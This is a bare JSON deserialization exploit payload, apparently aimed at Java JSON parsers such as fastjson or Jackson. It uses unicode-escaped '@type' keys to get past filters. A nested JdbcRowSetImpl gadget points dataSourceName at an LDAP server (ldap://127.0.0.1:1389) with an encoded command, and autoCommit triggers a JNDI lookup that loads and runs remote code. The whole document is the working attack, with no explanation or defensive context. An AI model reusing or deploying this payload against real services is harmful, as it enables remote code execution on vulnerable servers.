{
    "x": {
        "\u+040\u+074\u+079\u+070\u+065": "java.util.Currency",
        "val": {
            "currency": {
                "xx": {
    "x1": {
        "\u+040\u+074\u+079\u+070\u+065": "java.lang.Class",
        "val": "com.sun.rowset.\u004AdbcRowSetImpl"
    },
    "x2": {
        "\u+040\u+074\u+079\u+070\u+065": "com.sun.rowset.\u004AdbcRowSetImpl",
        "d\u0061taSourceName": "ldap://127.0.0.1:1389/Deserialize/Jackson/Command/Y2FsYw==",
        "\u0061utoCommit": true
    }
}
            }
        }
    }
}

